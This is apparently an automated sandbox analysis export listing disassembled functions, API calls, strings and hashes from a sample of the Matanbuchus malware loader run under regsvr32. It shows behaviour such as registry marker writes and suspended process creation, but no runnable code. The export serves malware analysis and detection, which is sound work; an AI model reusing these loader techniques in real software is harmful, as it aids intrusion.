                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Module$FileHandleName
                                                                  • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                                                                  • API String ID: 4146042529-3261600717
                                                                  • Opcode ID: 1787294a19f073831ed2340a83173167ce947be6eadf21f8e62bf7e6aefb951b
                                                                  • Instruction ID: a91566ebbfdfc8a56a3b996d4d193a10b3fa335ec16a863df118ae9500b0d4d5
                                                                  • Opcode Fuzzy Hash: 1787294a19f073831ed2340a83173167ce947be6eadf21f8e62bf7e6aefb951b
                                                                  • Instruction Fuzzy Hash: 3BC1B371A0020977D7165F28CD45FBBB37BDF94308F0852A8ED169F256F730AA42CAA1
                                                                  APIs
                                                                  Strings
                                                                  • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7F7EC283
                                                                  • d, xrefs: 7F7EC2E0
                                                                  • n_chars < number_buffer.size() - 1, xrefs: 7F7EC429
                                                                  • d, xrefs: 7F7EC39C
                                                                  • d, xrefs: 7F7EC445
                                                                  • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F7EC27E, 7F7EC424
                                                                  • @, xrefs: 7F7EC40D
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aullrem
                                                                  • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                                                                  • API String ID: 3758378126-3644039597
                                                                  • Opcode ID: 54f111d52a4808c6fdfbdef8f31640a17963a5a7f73fc190688e9162fe784de2
                                                                  • Instruction ID: 619f4f477d2f6836cd9233fbcf20858f354d79c15a88d0728b7b9e3fb40ca6fa
                                                                  • Opcode Fuzzy Hash: 54f111d52a4808c6fdfbdef8f31640a17963a5a7f73fc190688e9162fe784de2
                                                                  • Instruction Fuzzy Hash: B1F1D078E01219DFDB14CF99C881BDDBBB2BF49304F2081AAD91AAB355D7306A84CF55
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aulldiv__aullrem
                                                                  • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                                                                  • API String ID: 3839614884-178659603
                                                                  • Opcode ID: 7b757db5efccfabd6461e214d832c833bd32d918ded049ee63a4ed6b1dc7ed5f
                                                                  • Instruction ID: 86dd719b913f4bbc2e40fa78fc09b206e91fcdedd0e2f27d977174abb19faf68
                                                                  • Opcode Fuzzy Hash: 7b757db5efccfabd6461e214d832c833bd32d918ded049ee63a4ed6b1dc7ed5f
                                                                  • Instruction Fuzzy Hash: 7FE1B078E00219DFDB14CF99C980B9EBBB2FF48304F2081AAD919AB355D7346A95CF54
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7F83EF39
                                                                  • wsprintfW.USER32 ref: 7F83EF86
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7F83EFA3
                                                                  • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7F83EFC4
                                                                  • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7F83EFE4
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 7F83EFFD
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 7F83F008
                                                                    • Part of subcall function 7F83F6E7: GetTickCount.KERNEL32 ref: 7F83F705
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseValue$CountCreateOpenTickwsprintf
                                                                  • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                                                                  • API String ID: 730945307-550109914
                                                                  • Opcode ID: 1914d43ef7fd0079d012d5305d12c2043aa537949fd37cbd001e65a343cdab81
                                                                  • Instruction ID: 7e4fb5fc90b10e1c3308c12cfb55c53cf2a7e018a815d5761dbdf7149bde128a
                                                                  • Opcode Fuzzy Hash: 1914d43ef7fd0079d012d5305d12c2043aa537949fd37cbd001e65a343cdab81
                                                                  • Instruction Fuzzy Hash: DD313A72A00218BADF219B95CC49FDFBF7EEF04364F5000A5F605EA061D770AA58DBA1
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?), ref: 7F83F149
                                                                  • IsWow64Process.KERNEL32(00000000), ref: 7F83F150
                                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7F83F18C
                                                                  • wsprintfW.USER32 ref: 7F83F21A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 7F83F3A5
                                                                  • CloseHandle.KERNEL32(00000000), ref: 7F83F3B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                                                                  • String ID: 0x%x$?
                                                                  • API String ID: 3386633596-4137330559
                                                                  • Opcode ID: 1c999c170e8071ab00265fa07e3fa3318b908574372ec3c05f3ed57958a984db
                                                                  • Instruction ID: 6abd509522bcf516aaf4740cb0d5acc5b59992398782bdcdba2929792c7cdee6
                                                                  • Opcode Fuzzy Hash: 1c999c170e8071ab00265fa07e3fa3318b908574372ec3c05f3ed57958a984db
                                                                  • Instruction Fuzzy Hash: F6813FB2D01208BFEF099BA4CD85FEEB7BEEF04244F544065E515EA160E735AE408BE1
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 7F843C17
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 7F843C1F
                                                                  • _ValidateLocalCookies.LIBCMT ref: 7F843CA8
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 7F843CD3
                                                                  • _ValidateLocalCookies.LIBCMT ref: 7F843D28
                                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 7F843D3E
                                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 7F843D53
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                                  • String ID: csm
                                                                  • API String ID: 1385549066-1018135373
                                                                  • Opcode ID: 05491278e0b78d89019324127856507430bf3bb81a1d604c0d71a166baba9d07
                                                                  • Instruction ID: 9f4dc9b2c38299043f4c45d1a4c6d88800f484c1b81977ac4b535d855c69be8d
                                                                  • Opcode Fuzzy Hash: 05491278e0b78d89019324127856507430bf3bb81a1d604c0d71a166baba9d07
                                                                  • Instruction Fuzzy Hash: 0241A034A0030DABCF05DFA8C844BAEBBB7EF45264F149195DC159F392D731AA15EB90
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6B62FEB7
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 6B62FEBF
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6B62FF48
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6B62FF73
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6B62FFC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414282252.000000006B601000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B600000, based on PE: true
                                                                  • Associated: 00000007.00000002.2414267091.000000006B600000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414308000.000000006B63B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414326140.000000006B64A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414465986.000000006BAF7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414482610.000000006BAF8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6b600000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 1170836740-3733052814
                                                                  • Opcode ID: 138dcb655d1ef4da094b64f481ee049a44473b5a51eac0cedd17e5c7a4bc7383
                                                                  • Instruction ID: c01e114e048ea51f1a4eb1b0d685ba1a028d2db6ae65fde4c57d8a7a30f77dd5
                                                                  • Opcode Fuzzy Hash: 138dcb655d1ef4da094b64f481ee049a44473b5a51eac0cedd17e5c7a4bc7383
                                                                  • Instruction Fuzzy Hash: 7C51C3B4A002189FDF04DF68C840B9E7BB5FF46718F1480A9E8199B392D739DA45CFA1
                                                                  APIs
                                                                  • IsCharLowerA.USER32(00000073), ref: 7F83C78A
                                                                  • GetModuleFileNameW.KERNEL32(00000000,kernel32,00000000), ref: 7F83C7AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CharFileLowerModuleName
                                                                  • String ID: 9mD$kernel32$u${
                                                                  • API String ID: 515556390-2230072418
                                                                  • Opcode ID: 8e01e0777e80ffb4492042d24fa83327ae0ef1378c69a33795cb5bca6bdc8ea6
                                                                  • Instruction ID: 742094fc12c157a30bee720d8307cf5622c8b6792606af7f1b9276d099631a60
                                                                  • Opcode Fuzzy Hash: 8e01e0777e80ffb4492042d24fa83327ae0ef1378c69a33795cb5bca6bdc8ea6
                                                                  • Instruction Fuzzy Hash: 04B145B9D04258CFDB14CFAAC84579DBBF2BF49310F2481AAD458AB391E7341A81CF60
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 6B624DE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414282252.000000006B601000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B600000, based on PE: true
                                                                  • Associated: 00000007.00000002.2414267091.000000006B600000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414308000.000000006B63B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414326140.000000006B64A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414465986.000000006BAF7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414482610.000000006BAF8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6b600000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: DirectorySystem
                                                                  • String ID: ($8$?2$GB$r
                                                                  • API String ID: 2188284642-435796455
                                                                  • Opcode ID: 3194f8aa09312c11d46087879b4c39cdcac34dc238a90b4f6c0e05106159db4b
                                                                  • Instruction ID: f16d2866041e0fd2bbdf5ccb67341f02ecbf26a54c957779d861b2e542784fd1
                                                                  • Opcode Fuzzy Hash: 3194f8aa09312c11d46087879b4c39cdcac34dc238a90b4f6c0e05106159db4b
                                                                  • Instruction Fuzzy Hash: E1714A74904698AFDF14DFAAC4806ACBFF1AB5B304F04C1AEE498A7399E7348645CF15
                                                                  APIs
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 6B62D09A
                                                                  • Sleep.KERNEL32(00000064), ref: 6B62D0A7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414282252.000000006B601000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B600000, based on PE: true
                                                                  • Associated: 00000007.00000002.2414267091.000000006B600000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414308000.000000006B63B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414326140.000000006B64A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414465986.000000006BAF7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414482610.000000006BAF8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6b600000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: DirectorySleepWindows
                                                                  • String ID: )$X$Z$t
                                                                  • API String ID: 1499897475-3436847989
                                                                  • Opcode ID: 8154539685cb464645a102619244e1c1a26d5be51872e209b7fded7dbcd2c211
                                                                  • Instruction ID: e3ac901c14834a57a7c59107c06cf7042bdb42a211c5b13e4de9181f4ecb7f53
                                                                  • Opcode Fuzzy Hash: 8154539685cb464645a102619244e1c1a26d5be51872e209b7fded7dbcd2c211
                                                                  • Instruction Fuzzy Hash: 515102B4D04B98EADB14EFAAC48069DBBB1FF5B304F1081A9D458AB355E3348A85CF11
                                                                  APIs
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F833EFF
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F833F19
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F833F33
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F833F4D
                                                                  Strings
                                                                  • false, xrefs: 7F833F6E
                                                                  • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F833F69
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::bad_exception::bad_exception
                                                                  • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                                  • API String ID: 2160870905-4036550669
                                                                  • Opcode ID: f56a6d4669d5bc1ab604aab8ee8b839211be5df04b0a30524c75678a9e37436d
                                                                  • Instruction ID: 88d74feb0f1271771df301f27576ec028e5437e0b87bff809604cae50693ecd7
                                                                  • Opcode Fuzzy Hash: f56a6d4669d5bc1ab604aab8ee8b839211be5df04b0a30524c75678a9e37436d
                                                                  • Instruction Fuzzy Hash: 51212D71A00308EBCB18DFA8C980EEE77B6EF45300F14855DA5116F255DF35AA199B61
                                                                  APIs
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F833DDF
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F833DF9
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F833E13
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F833E2D
                                                                  Strings
                                                                  • false, xrefs: 7F833E4E
                                                                  • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F833E49
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::bad_exception::bad_exception
                                                                  • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                                  • API String ID: 2160870905-4036550669
                                                                  • Opcode ID: c29e0f1973c3ae89a4fa0899476012a694721dfafa905d40e4c1065a5cfe5a27
                                                                  • Instruction ID: 9f680fdafacf7dc3b14cb2767fe6be59740d2c43baf6f86db9e4342c7021ef11
                                                                  • Opcode Fuzzy Hash: c29e0f1973c3ae89a4fa0899476012a694721dfafa905d40e4c1065a5cfe5a27
                                                                  • Instruction Fuzzy Hash: DB212B71A00308EBCB18DFA8C990EEEB7B6FF84300F148559A5116F251EF35AA199B60
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,7F85413B,7F851108,0000000C,7F8652A0,00000000,00000000,?,7F854388,00000021,FlsSetValue,7F86D860,7F86D868,7F8652A0), ref: 7F8540EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3664257935-537541572
                                                                  • Opcode ID: de835b30a118452394bcf56773b08144c5902691f280ec4a704d635227a60e72
                                                                  • Instruction ID: 5926f8613ce6476851ad4f2289c8bea35d848b30908e5d2725ca1a7b8b9039fe
                                                                  • Opcode Fuzzy Hash: de835b30a118452394bcf56773b08144c5902691f280ec4a704d635227a60e72
                                                                  • Instruction Fuzzy Hash: EB21C936915221EBCB625B66CC95B5A7777EB41370F380220ED06AF281DB30E919CAD1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414282252.000000006B601000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B600000, based on PE: true
                                                                  • Associated: 00000007.00000002.2414267091.000000006B600000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414308000.000000006B63B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414326140.000000006B64A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414465986.000000006BAF7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2414482610.000000006BAF8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6b600000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: ($8$?2$GB$r
                                                                  • API String ID: 3472027048-435796455
                                                                  • Opcode ID: 64e01125b3ae9da9e511d898fb7fe35ae2fd38e437add3375cca42f310b48655
                                                                  • Instruction ID: 13355d4605973b0418f1591129d274a027b0518e7fd0a290672407a594acc959
                                                                  • Opcode Fuzzy Hash: 64e01125b3ae9da9e511d898fb7fe35ae2fd38e437add3375cca42f310b48655
                                                                  • Instruction Fuzzy Hash: 54915BB0D04698EFEF14DFAAC4806ADBBB2BB1B704F14C1A9D058A7349D3389A44CF55
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 7F840525
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 7F840590
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7F8405AD
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 7F8405EC
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7F84064B
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7F84066E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringWide
                                                                  • String ID:
                                                                  • API String ID: 2829165498-0
                                                                  • Opcode ID: ca2e25c5fae8f47e63ef77cc9d4adaf581a6c861a37e5fe4f09d2acf21ad57a4
                                                                  • Instruction ID: f3b209cdfbe3e5891bed62cdfda573fc55630bc60c0d46b0217aea50bb0fbc1a
                                                                  • Opcode Fuzzy Hash: ca2e25c5fae8f47e63ef77cc9d4adaf581a6c861a37e5fe4f09d2acf21ad57a4
                                                                  • Instruction Fuzzy Hash: 38517A7691030EAFEB154F64CC45FBB3ABAEF84760F115529F926AE150EB3498108BA0
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7F84F265
                                                                  • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7F84F277
                                                                  • swprintf.LIBCMT ref: 7F84F298
                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7F84F2D5
                                                                  Strings
                                                                  • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7F84F28D
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ConsoleFileHandleTypeWriteswprintf
                                                                  • String ID: Assertion failed: %Ts, file %Ts, line %d
                                                                  • API String ID: 2943507729-1719349581
                                                                  • Opcode ID: 1080df94d98fcc1dd728078367a4f36976d2fb85aca3c44b09070e16e8c3ee75
                                                                  • Instruction ID: 2dd8e015b4c5ce60bba7d4bfabfb50b24d82a36a2f22466f107cd7efe98dda2f
                                                                  • Opcode Fuzzy Hash: 1080df94d98fcc1dd728078367a4f36976d2fb85aca3c44b09070e16e8c3ee75
                                                                  • Instruction Fuzzy Hash: 4E11047A90022C6BCB149F29CC45AEF77BEEF44320F50555DE926DF145EA30AD41CBA4
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,85A95D7F,7F8652A0,?,00000000,7F863C13,000000FF,?,7F85077A,7D83FC4D,?,7F85074E,7F8652A0), ref: 7F85081F
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7F850831
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,7F863C13,000000FF,?,7F85077A,7D83FC4D,?,7F85074E,7F8652A0), ref: 7F850853
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 7c97d0da84f394ca695e5bf4030e2245a9a88ded998986033c7f44da6e6a6b58
                                                                  • Instruction ID: d7eb0f4ea31fa74ee1dcf9bb97a56a5b2d7a9be187f78bbbb5f702bc05cdeb1c
                                                                  • Opcode Fuzzy Hash: 7c97d0da84f394ca695e5bf4030e2245a9a88ded998986033c7f44da6e6a6b58
                                                                  • Instruction Fuzzy Hash: 52018436A10615AFDB128F51CC05FAE7BB9FB04725F000225EC22AE381EB749400CAD0
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7F7F5807
                                                                  • int.LIBCPMTD ref: 7F7F5820
                                                                    • Part of subcall function 7F7FAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F7FAA36
                                                                    • Part of subcall function 7F7FAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F7FAA60
                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 7F7F5867
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7F7F58FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                  • String ID:
                                                                  • API String ID: 3053331623-0
                                                                  • Opcode ID: 5756d98e840af2cce712511ed9e4112db0b7b38e5edb1ecc87b85bbb6726409b
                                                                  • Instruction ID: 5528b80b2c13b0a417cd9c6568ede89d08d9b347b8857d9e98ba0c8b5e13dacd
                                                                  • Opcode Fuzzy Hash: 5756d98e840af2cce712511ed9e4112db0b7b38e5edb1ecc87b85bbb6726409b
                                                                  • Instruction Fuzzy Hash: 0941A6B4D00609DFCB04DF98D990AEEBBB5FF48310F208259D925A7390DB346A45CBA1
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7F7F56C7
                                                                  • int.LIBCPMTD ref: 7F7F56E0
                                                                    • Part of subcall function 7F7FAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F7FAA36
                                                                    • Part of subcall function 7F7FAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F7FAA60
                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 7F7F5727
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7F7F57BB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                  • String ID:
                                                                  • API String ID: 3053331623-0
                                                                  • Opcode ID: 6af61b8f95caff257e22511fd8470cf75c95b6ea15d7b0e2166d02a746e5ac5d
                                                                  • Instruction ID: ba177cfc7c368245f2ce4fb9c70716945b3e692cccd5e9640922619662d30b28
                                                                  • Opcode Fuzzy Hash: 6af61b8f95caff257e22511fd8470cf75c95b6ea15d7b0e2166d02a746e5ac5d
                                                                  • Instruction Fuzzy Hash: D94196B4D00609DFCB04DF98D990AEEBBB5FF48310F608259D815A7394D7346A45CFA1
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7F7F5947
                                                                  • int.LIBCPMTD ref: 7F7F5960
                                                                    • Part of subcall function 7F7FAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F7FAA36
                                                                    • Part of subcall function 7F7FAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F7FAA60
                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 7F7F59A7
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7F7F5A3B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                  • String ID:
                                                                  • API String ID: 3053331623-0
                                                                  • Opcode ID: 7036cdf08c8b706ad2661fba7c6a7d2830e8fd1f72de56d7a972716446e3ff27
